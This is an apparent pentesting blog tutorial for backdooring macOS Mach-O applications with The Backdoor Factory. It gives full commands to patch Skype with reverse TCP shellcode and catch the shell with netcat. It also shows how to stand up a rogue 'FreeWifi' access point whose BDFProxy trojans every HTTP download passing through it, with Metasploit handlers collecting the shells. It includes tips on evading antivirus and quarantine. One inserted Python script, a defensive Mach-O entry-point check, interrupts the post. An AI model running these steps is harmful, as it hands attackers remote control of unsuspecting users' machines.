More Mach-O Backdoors for Pentesters (Now with BDFProxy!)

Yoyo! Last time we talked about building various custom scripts into native OS X applications. This time, we're going to put raw shellcode into Mach-O executables via some awesome code-caving methods! This is a great technique, and the tool takes the tedium out of it: BDF now supports Windows PE x86/x64, ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32), and Mach-O x86/x64. Basically, The Backdoor Factory project rocks! We're going to build a simple Mach-O backdoor out of a popular app by repacking it with some reverse TCP shellcode. This is actually a great method for evading AV and general inspection, but it will stick out to file integrity monitoring tools (like Midas), since the executable on disk is no longer the one the vendor shipped.

Start by downloading and installing The Backdoor Factory:
git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
sudo sh install.sh
python backdoor.py --help

Now we are going to backdoor the popular OS X application Skype (if you pull it down with a browser, it will be flagged with Quarantine; if you wget it [wget http://www.skype.com/go/getskype-macosx], you can run it without accepting the security risk. P.S. love that HTTP download link, that will come into play later). Pull down the DMG, mount it, and drag the application to your Desktop. Next, launch The Backdoor Factory with the following command:
python backdoor.py -f ~/Desktop/Skype.app/Contents/MacOS/Skype --shell=reverse_shell_tcp --hostip=127.0.0.1 --port=7777 -o Skype -J

Now overwrite the old mach-o with your new backdoor:
cp ./backdoored/Skype ~/Desktop/Skype.app/Contents/MacOS/Skype

We will now start a netcat listener to grab the reverse shell:
nc -l 127.0.0.1 7777

Now run the application and grab your reverse shell :) Awesome! I've always wanted to backdoor Skype. To improve this method, use some custom shellcode, preferably something with encryption to protect your shell on the wire. You may also have to accept the Quarantine risk, depending on the user's 'Security and Privacy' settings for 'Allow apps downloaded from', and on whether you could bypass it with a non-participating download application (lots of options here).
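A defender-side check to go with the file-integrity caveat above, added here as an example (it is not part of the original post or of The Backdoor Factory): code-cave patching leaves the file's entry point pointing somewhere other than the real code, so this script parses a thin 64-bit Mach-O and flags an LC_MAIN entry offset that falls outside __TEXT,__text. The constant values are the standard Mach-O header definitions; build_sample constructs a header-only test image, and a cave inside __text's own padding would not be caught, so pair this with codesign verification or hash baselines.

```python
"""Flag a 64-bit Mach-O whose LC_MAIN entry point lies outside __TEXT,__text.
Added example, not The Backdoor Factory's code. Assumes a thin little-endian
x86-64 image; fat and 32-bit files are rejected rather than parsed."""
import struct

MH_MAGIC_64 = 0xFEEDFACF          # 64-bit little-endian Mach-O magic
LC_SEGMENT_64 = 0x19              # segment_command_64
LC_MAIN = 0x80000028              # entry_point_command (LC_REQ_DYLD | 0x28)

def check_entry_point(data):
    """Return the entry offset, the __text file range and a suspicious verdict."""
    magic, ncmds = struct.unpack_from("<I", data, 0)[0], struct.unpack_from("<I", data, 16)[0]
    if magic != MH_MAGIC_64:
        raise ValueError("not a thin 64-bit little-endian Mach-O")
    off, entryoff, text = 32, None, None          # load commands follow the 32-byte header
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmd == LC_SEGMENT_64:
            segname = data[off + 8:off + 24].rstrip(b"\0")
            nsects = struct.unpack_from("<I", data, off + 64)[0]
            soff = off + 72                        # section_64 entries follow the command
            for _ in range(nsects):
                sectname = data[soff:soff + 16].rstrip(b"\0")
                size, offset = struct.unpack_from("<QI", data, soff + 40)   # size, file offset
                if segname == b"__TEXT" and sectname == b"__text":
                    text = (offset, offset + size)
                soff += 80
        elif cmd == LC_MAIN:
            entryoff = struct.unpack_from("<Q", data, off + 8)[0]   # file offset of main()
        off += cmdsize
    if entryoff is None or text is None:
        return {"entryoff": entryoff, "text": text, "suspicious": True,
                "reason": "LC_MAIN or __TEXT,__text missing"}
    inside = text[0] <= entryoff < text[1]
    return {"entryoff": entryoff, "text": text, "suspicious": not inside,
            "reason": "entry point inside __text" if inside else "entry point outside __text"}

def build_sample(entryoff, text_off=0x1000, text_size=0x200):
    """Constructed header-only Mach-O: one __TEXT segment holding __text, plus LC_MAIN."""
    sect = struct.pack("<16s16sQQIIIIIIII", b"__text", b"__TEXT", 0x100001000, text_size,
                       text_off, 4, 0, 0, 0x80000400, 0, 0, 0)
    seg = struct.pack("<II16sQQQQiiII", LC_SEGMENT_64, 72 + 80, b"__TEXT",
                      0x100000000, 0x2000, 0, 0x2000, 7, 5, 1, 0) + sect
    main = struct.pack("<IIQQ", LC_MAIN, 24, entryoff, 0)
    cmds = seg + main
    return struct.pack("<IiiIIIII", MH_MAGIC_64, 0x01000007, 3, 2, 2, len(cmds), 0, 0) + cmds
```

To run it against a real binary, pass the file's bytes to check_entry_point (for example, the Skype executable before and after repacking) and compare the two verdicts.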

Next we are going to use BDFProxy, in conjunction with our rogue access point (from last week), to automatically backdoor binaries that go over HTTP. We are also going to set up listeners for each of these shells in Metasploit automatically, basically creating an extremely hostile local wireless network. We will be doing the following in Kali Linux, so let's get started by pulling down BDFProxy and all of the rogue access point tools we need:

apt-get install bdfproxy hostapd dnsmasq wireless-tools iw wvdial

Let's start by setting up our rogue access point, just like last time. We should already have Internet via NAT passthrough from our Kali VM to our host OS on eth0:

sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/192.168.1.1
#address=/google.com/192.168.1.1
interface=wlan1
dhcp-range=192.168.1.10,192.168.1.250,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
#no-resolv
log-queries
EOF

service dnsmasq start

ifconfig wlan1 up
ifconfig wlan1 192.168.1.1/24

cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan1
driver=nl80211
ssid=FreeWifi
channel=1
#Support for the Karma attack.
#enable_karma=1
EOF

iptables -X
iptables -F
iptables -A FORWARD -i wlan1 -o eth0 -s 192.168.1.1/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
iptables -t nat -A PREROUTING -i wlan1 -s 192.168.1.1/24 -p tcp --dport 80 -j REDIRECT --to-port 8080

service hostapd start

Before we start BDFProxy, we need to edit the config file (vi /usr/share/bdfproxy/bdfproxy.cfg) to match our current setup; this means changing all of the C2 lines to: HOST = 192.168.1.1 #The C2
Finally, start the MITM proxy: bdfproxy

You're going to have to watch this window, as any file that now comes across your rogue wireless network and is downloaded over port 80 will start the regular Backdoor Factory interactive prompt, which involves choosing which code cave you want to put your shellcode in. It's important to stay aware of this window and keep moving downloads through, as it will hold users' downloads in limbo while their files are being processed by BDFProxy. You can also keep an eye on the log file for files that have come through by issuing:
tail -f /usr/share/bdfproxy/proxy.log

You will also want to launch Metasploit with the proper resource file to automatically set up handlers for each backdoor implant you've prepared. To set up your handlers to receive your reverse shells, simply issue: msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

Just like last time, for some more great ideas on which OS X Mach-O applications to backdoor, check out this recent talk on OS X persistence via backdooring applications by The Backdoor Factory author himself, Joshua Pitts:

There's always more than one way to skin a cat, however. In this other post, my friend Chuancy Davenport shows you how to backdoor binaries on the fly using BDFProxy, but instead of using a rogue AP, he uses mitmf to launch an ARP spoof first!! It's another great way to get the man-in-the-middle position you need to get your BDFProxy running, and he uses a totally different framework to get it working, so it's definitely a solid post to check out if you're liking the BDFProxy mode.